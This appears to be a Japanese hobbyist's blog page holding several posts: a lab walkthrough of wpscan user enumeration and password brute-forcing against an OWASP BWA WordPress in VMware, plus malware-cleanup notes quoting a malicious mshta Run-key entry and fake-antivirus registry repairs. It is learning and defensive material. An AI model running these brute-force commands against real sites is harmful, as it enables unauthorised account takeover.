備忘録 一覧

【備忘録】ペネトレーションテストまがいの休日【KaliLinux】

どうも、毎度(笑)ご無沙汰してます、けーすけです。
今日は自分用の備忘録です。
加えまして、結構Webの先人の皆様のサイトを参考にさせていただきながらも躓いてしまった部分を記録しておきたいと思いまーす。

先日よりさんざん話題になってるwordpressの脆弱性の問題で、まあ、自分も色々いじってみようと思い、仮想環境を構築&いじる事にしましたー。
まずは何はなくとも仮想環境作らなくちゃいけないので、WMware Workstationをインストールしまーす。
自分の環境はWindows10 64bitなのでその通りにインストール。

続いて定番のKali Linuxのisoをダウンロードしまーす。
ここで問題発生。

2.9GM

ダウンロードに失敗しまくりwwwwwwwwwww
こんなんISDN時代以来やんwwwww
何度か頑張ってようやくダウンロード完了。
これを仮想環境にマウントしまーす。
こちらの手順は、以下のありがたいサイトさんを参考にさせていただきました。

Vmwareを使ってLinuxOS(Kali-Linux)を導入しよう

バージョンが違うので多少手順が異なってはいましたが、なんとかなりました。
まあ...そもそもVMwareを起動した時点で、
「バイナリ変換は、このプラットフォームでのロングモードには対応していません。ロングモードを無効にしています。ロングモードのサポートがないと、仮想マシンは64ビットコードを実行できません。詳細については、http://vmware.com/info?id=152 を参照してください。」
のエラーが出る事態になり、BIOSの「Intel Virtualication Technology」の初期値が「Disabled」になっていた事に気づき、実に久しぶりにBIOSの設定をなおすというあるあるもありました...。すみませんね、初心者で...。

さて、アコガレ?のKali Linuxを無事起動すると、きました~、中二病全開のこの画面wwwww
クリップボード2.png
うん、かっこいいですねw。

さて、起動したら今回はwordpressに攻撃を仕掛けるために作業してるので、OWASP BWAの環境をもう一個構築します。
ここでさりげなく躓きました。
参考にさせて頂いたのは、こちらのサイト様です。

VirtualBoxでわざと脆弱性を持たせたサーバの作り方 ~やられサイト構築~

こちらのサイト様ではOracleVM VirtualBoxを利用されていたので、環境の違いでやや戸惑いました。
それと...やっぱりOWASP Broken Web Applications Projectからのダウンロードが時間かかってちょっと折れたw
でもよく読んでいけばVMwareのソフトが違くても大丈夫です。

設定が終わって起動出来れば仮想脆弱性アプリのURLが出来るので、KaliLinuxの方からやりたい放題になります。
20170214_02.png
表示されたURLを使えばKali Linuxから各種脆弱性やりたい放題プレイが可能です。
ラインナップにつきましては、こちらのサイト様をご参照いただけると最高です。

OWASP BWA (The Broken Web Applications) とは?

ここまで出来たら手が後ろに回らない準備が出来ましたのでwwww
今日のところはBrute Forceで軽くテストします。
使うToolはwpscanです。
こちらに関しては、サイバーセキュリティ研究所様のWPscan入門を参考にさせていただきました。
コマンドラインの入力時に、"--"で始まるので少し注意が必要です。
こちらの解析ツールは、トータルの脆弱性診断をしてくれるのがスゴイっすね!(`ФωФ')

Brute Forceの前に、パスワードのリストをダウンロードします。
# wget http://download.openwall.net/pub/wordlists/all.gz
さくっと展開。
# gunzip all.gz
このファイル、ただのテキストなのに56.6MBもありますw

あとは簡単。
WPscanを起動して、
# wpscan --url http://***.***.**.***/
の実行で脆弱性の診断がサクっと出来る上に...ユーザアカウントもゲットできたりする事もあり。

アカウントがわかれば、以下のコマンドでBrute forceが実行できます。
# wpscan --url http://***.***.**.***/ --wordlist パスワードテキスト.txt --username アカウント

ちなみに今回の検証は2分かからなかったです。
bf_20170214.png今日はここまで。
本来のwordpressの脆弱性については次にでもつっつきます。

ではまたー(=゚ω゚)ノシ







【MT5】Tweet画面ウィジット追加【Twitter】

皆様こんばんは、そろそろ赤ワイン&レバーペーストとかとかの気分のけーすけで、御座います。
如何お過ごしでしょうか?

ようやっとブログの右ペインのウィジットにツイッターのつぶやきを連動させました。
やりやすいようで難しいMovable Typeそのものって感じですよねー...。
色々ご迷惑をお掛け致しておりますが、年内にはなんとかカタチにしつつ、釣りにもイキたいんだぜ、って思ってますです。

っていうか...年賀状...間に合うんか???


待て!次号!!www

【MT4】アップデート備忘録【MT5】

皆様こんばんは、寒くなってきてようやくデスクトップPCの前に落ち着けるようになったけーすけで、御座います。如何お過ごしでしょうか?

2週間以上も経過してようやっとブログのメンテナンスがカタチになってきましたYO!
毎度バージョンアップは苦しみに満ち満ちている...なんてこった。
今回はMovable Type4.261から5.2.9へのアップデートです。
もう毎度の事ながら...最初の作り方が悪かったせいであれやこれや問題山積み状態で死にそうでございましたとも...。
プラグインもMT4のみの対応のものばかりだったので新しくインストール。
新機能としてはスマートフォンでの閲覧ページを用意しましたよーん。トップページのURLにアクセスすると自動的にスマホ用のレイアウトに飛べるので問題ないかな、と思います。
いかがですかね?

レイアウトやデザインはまだ確定ではないのでこれから変更ある予定ですが、引き続き宜しくお願い申し上げます。
 
【画像アップロードテスト】
1380944727419.jpg

九州で食べた白熊~

【ロゴ】ブログ名若干変更しました【18禁】

  • 更新日:
  • Web, 備忘録
  • blog, MT4

皆様こんにちは、先日病院に行ってからというもの、鼻血の回数が半減し、嬉しいやら寂しいやら複雑乙女ゴコロのけーすけで、御座います。
如何お過ごしでしょうか。

今回は、実は以前から変えよう変えようと思ってそのまま絶賛放置中というよくあるパターンだったブログ名を若干変更。
下なネタやら何やらが注意書きちぃちゃいままに掲載されるのも世の中的にはマズかろうや、と思いまして、堂々のR18指定ロゴ作成(笑)。
これ一度つけてみたかったんだよねーウキウキ。
フォントどうしようかと思ったけど、日本語じゃないので案外あっさり決定。

logo.jpg

こんな感じで作って透過GIFにしてロゴ自体はさくっと完了。

こっからやや苦戦した。

普通のテキストをブログタイトルにしてリンクしてあったので、まずバナーのモジュールを1個作ってそれをヘッダーに割り込ませてタイトルバナーを画像にする。ここまでは問題なくOK。
参考にさせて頂いたサイトさんはこちら。
eNA-Photoの自宅サーバー作成メモ
有難う御座います。

問題はこの後でして、スタイルシートのcssファイルを書き換えた時、text-indent: -9999px; を使った元テキストとの置換が出来ず、二重に表示されてしまって参った。
この時間にアクセスして下さった方にはみっともない状態のブログタイトルが見えたかも(笑)。

答えは簡単、さらに上位のテキストの指定で

h1, h2, h3, h4, h5, h6 {
font-weight: normal;
}

が指定されてたのでh1だけ切り離して指定して再構築して完了。

という事でバタバタとタイトルが若干変わりましたが、今後とも宜しくお願い申し上げます。

【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】

皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。

久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。

HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。

O4 - HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"

HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。

INTERNET Watch の情報サイト

【掃除】レイアウト変更【師走】

皆様こんにちわ、先日トイレでパンツあげようとしたら親指が"ザク"っと入って文字通り人生初パンツに穴開けたけーすけで、御座います。
如何お過ごしでしょうか。

遂に師走~っていうか毎日忙しくて渋谷某所のカウンターでのおねむも遠のきがちで(むしろヤメとけってか)困ったモンですたい。宴会の時期にあんまり飲み歩かない異常事態発生か?!(東●ポ風見出し)
でも家では晩酌してるから心配ない(?)。

年末年始は忙しい予定のようなので、ようやく重いケツ(腰)あげて部屋を片付けた。
てか蓋開きっぱなしだったPCもようやく完成(おせーよ)してレイアウト変更・・・。

IMGP0088.JPG

どうっすか?!スッキリー!!!
Oh!やりゃ出来るじゃねぇーか。これで年末の心配は半減ってヤツか。いやいや年賀状まだでしょ・・・。奥の窓際に鎮座してるのがワタクシの大事な大事な月下美人で御座います。
では、詳細見てみましょう・・・。

IMGP0089.JPG

机の上拡大。
モニターの右側にスタンドしてるのはウェブカメラっす。Skype用だけど良く考えたらこっからストリーミング配信すれば自宅の様子が24時間見えちゃうよー?・・・留守中にナニか映ってたら怖いのでやめとこう・・・。
安スピーカーはモニターの後ろに置いてありますがまぁこれは正直買い換えるべき。キーボードは今回奮発した。
モニター左下は香炉。そしてキープ中の柿・・・。

IMGP0090.JPG

本体こちら。
今回作成したPCが左側だね。右側はどうしようかな、しばらくしたらOS換えちゃおうかな。何故かマルイカ仕掛けがPCの上に放置中。画面左上の牛は今や懐かしい(名前はまだあるわな)GATEWAYの牛
・・・・・・・・これ見てるともう1台PC作ってもいいかもねー。

IMGP0091.JPG

その上。
旧PCのモニターと、その上に右からパイオニアのオーディオセット(車内のデッキもパイオニア~ん)、中央がI/OデータのNAS。その左が何故かバスケット一杯の・・・ワインのコルク収集中。コルクの数=撃墜・・・された数か?!
一番右がCanonのモノクロレーザープリンタでござる。
自分プリンタはEPSON派だけど、当時(すげぇ昔だよこれ買ったの)このサイズのモノクロレーザーはCanonしかなかったんだよね。

IMGP0093_2.JPG

おニュー(死語)PCのエンブレム。すっげぇ懐かしいバーチャロン・オラトリオタングラム~。我が青春のゲーセン時代・・・(遠い目)。
すっかりオッサンになったなーオレも。

って思ってたらバーチャロン フォースがXBOXで出ちゃうのねー!
・・・流石に買わん・・・オラタンの時のコレの為だけにドリキャス買った私は負け組だった、か・・・ガクッ・・・専用コントローラも買ったのになー・・・。


相変わらずかっちょえぇ・・・(人´∀`).☆.。.:*・゚
・・・ま、まぁ壁紙はダウンロードしよう、そうしよう(汗)。
え?自分?自分の機体はもーっちテムジンっすよ♪足とかかわえぇ・・・。

【備忘録】
すぐPCのスペック忘れるから記録しとこ・・・
CPU:intel Core i7-870
マザボ:intel DP55WB
メモリ:DDR3-1333 8GB(MAX16GB)
HDD:Seagate ST31000528AS (1TB SATA300 7200)×2
ビデオカード:msi R5670
OS:Windows7 x64 Pro

今んトコ順調。
HDDをRAID0で構成して2TBで使ってるけど気が向いたら構成変えるかもしれん。・・けどあんまりバックアップにこだわらないからどうだろうな。PCでゲームやる気がまるで無いのがバレバレでござる。
intelのマザボもイイっすね。

次ちーちゃいの作ろうっかなー・・・今CPU安いね。

 

【Webページ】スカさんのデータ更新

皆様こんにちわ、昨は渋谷某所でぱんつ屋さん・Mr.K・ししょ~と楽しすぎた為飲み過ぎ&二日酔いのけーすけで、御座います。
如何お過ごしでしょうか。
まぁ、二日酔いっていうかまだずっと酔っ払ったままっていうか・・・・・・ね。へへへ。

ブログ眺めてたらすごい事に気付いた。
一番最初に作ってたウェブページへのリンクがどこにもない。っていうか一度ブログが壊れて復旧した時にどっかへ流してしまったらしいので再構築&ちょろっと更新。おもに愛車のカスタムパーツを少し書き換えました、が・・・・・・オーディオの情報がアルパインのままだった事に今気付いた。
現在はパイオニアなんスけど、機種が何だったか忘れたので後日追記する事と、する・・・。
GF-HR34 Skyline 改 カスタムパーツ記録

778576_3845591144.jpg

現在総走行距離23万キロ程度の平成11年モデル。色は深蒼。
10代目の、そして最後のRBエンジンのスカイラインで2000ccのやつです(今は違うけど)。この写真はちょっと古いかなー。なんだかんだで何度もドナドナ(積載)されてここまで来ましたが、復活する度に可愛くて可愛くてもー・・・こいつめーって具合?
次はミッションが壊れる予定(笑)。
これからも末長く宜しくお願いしますよーっっ!!

【ウイルス】ウイルスの季節がまた来ましたな【備忘録】

皆様こんにちわ、昨夜は渋谷某所でネクタイ鉢巻して御満悦のけーすけで、御座います。
如何お過ごしでしょうか。

まぁ呑み喰い話は別として、毎年この時期ってコンピュータウイルスの活動が活発になり、激増。それを見て「あぁ・・・夏になったなぁ・・・」なーんて思うわけなんですけどね。
インチキウイルス対策ソフト系がまた活発だなぁ・・・・。
Security Tools とか。

C:\WINDOWS\Temp\_ex-08.exe
C:\documents and settings\【user】\Local Settings\Application Data\[ランダムな数字 ランダム桁].exe

あたりを削除して、スタートアップの確認と、"_ex-08.exe"の方はレジストリのRunにも書かれているから削除。
んでもComboFix一発で結構綺麗になるようだ。今のところは
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

加えて今日初めて遭遇したWindowsのちょっと驚いた件
コマンドプロンプトで ipconfig /all でMAC見ようとしたら通らず。あり?と思ってネットワーク接続から開こうとしたところ・・・・・・ネットワーク接続のフォルダが空っぽ・・・・はひ?
と思ったらMSのパッチ適用に関しての重大な問題で既出らしい
http://www.forest.impress.co.jp/article/2005/10/17/ms05051problems.html
http://support.microsoft.com/kb/909444/ja
うーん・・・実物初めて見た。

自分「ネットワーク接続のフォルダを開いて下さい」
相手「真っ白です」
自分「え・・・・・・・・・・」

俺様もアタマ真っ白(笑)。

【MT4】遅まきながらようやく開始なう!【Twitter】

皆様こんにちわ、最近二日酔いに何故かならなくなったけーすけで、ございます。
いかがお過ごしでしょうか。
なんでかしらん・・・やっぱりウコンとハイチオールCが効いてるンですかね。ちなみにこのブログを検索サイトから探して来て下さっている方の中では、"ハイチオールC 酒"という検索ワードがかなり上位になってます。
お酒大好き人間はハイチオールC!是非オススメでございますよー。

さて・・・・・・・題名の通り、ちょこちょこっとブログメンテナンスしました。トップページ右カラム内のリンクが壊れたままになっていたのをようやく改修。
リンクさせて頂いていた方々、大変失礼致しました。
新たにクボタプロセスさんへのリンク開通。今後とも宜しくお願い致します。

久しぶりに再構築。

前回の総入れ替え以来なので流石に記事も増えて再構築も時間かかります。今回7分1秒かかりましたナー。

続きまして、ようやくTwitter開始。
keisuke_remixをフォローしましょう
船の上やら渋谷某所やら温泉やらでつぶやいてみたいと思ってますが、どうなることか・・・とアカウントを取得後、せっかくなのでこのブログから表示させるようにウィジット追加。

今後ブログの更新を自動的にTwitterに反映させるようにプラグイン追加予定。・・・いつになるかわからんが。

イカ釣り行って黙ったままだったらきっと釣れてるかも?!(笑)
始めたばかりで使い方すらわかっておりませんが、宜しくお願いしまーす。

【マルウェア】Vista Internet Security 2010【備忘録】

最近のインチキウイルス対策ソフトを装ったマルウェアはほんとに良く出来てる。
何故か日本語の解説ページが少なかったからメモ程度に備忘録。

掲題のウイルス対策ソフトを装ったマルウェア。
これまたしつっっこいくらいに出てくる。

プロセス名を確認すると、av.exe

タスクマネージャから停止するのは簡単だけど、すぐまた出てくる。
んでもって%UserProfile%AppData\Local\av.exe
を削除すると、.exe系や、フォルダオープンをすると関連付けを求められる・・・ってことは?

ってなわけで、

exefix.jpg

としてレジストリ修正ファイル作成(右クリック保存でファイルをどうぞ)。中身は以下の通り。

[-HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command]
[-HKEY_CURRENT_USER\Software\Classes\secfile\shell\open\command]
[-HKEY_CLASSES_ROOT\.exe\shell\open\command]

[HKEY_CLASSES_ROOT\.exe]
@="exefile"
"Content Type"="application/x-msdownload"

[-HKEY_CLASSES_ROOT\secfile]

実行すると改変されたレジストリが修正されるので、以下のファイルを削除
%UserProfile%\AppData\Local\av.exe
%UserProfile%\AppData\Local\6L0id5G
↑2行目のファイルはランダムに変更になるので適当に。

このページの上部へ

About

脱HTMLの為にちまちま手動で作った管理人けーすけの試行錯誤ブログ。
愛車スカイライン&コペンと温泉と酒と烏賊釣り触手吸盤プレイの日々…破廉恥下ネタアリのfor Adult仕様
ようやくスマホ向けページが出来たよヽ(`Д´)ノウワァァァン!!

プロフィール

HN:けーすけ
愛車HR34と温泉と釣りとお酒をこよなく愛する3●歳
Twitterアカウントは@keisuke_remixで。

サイト内検索

最近のコメント

最近のピクチャ

  • クリップボード2.png
  • DSC_0156_2.JPG
  • DSC_1174.JPG
  • Screenshot_2015-12.png
  • DSC_1165.JPG
  • DSC_1161.JPG
  • DSC_0419.JPG
  • DSC_0394.JPG
累計
本日人  昨日

Powered by Movable Type 5.161-ja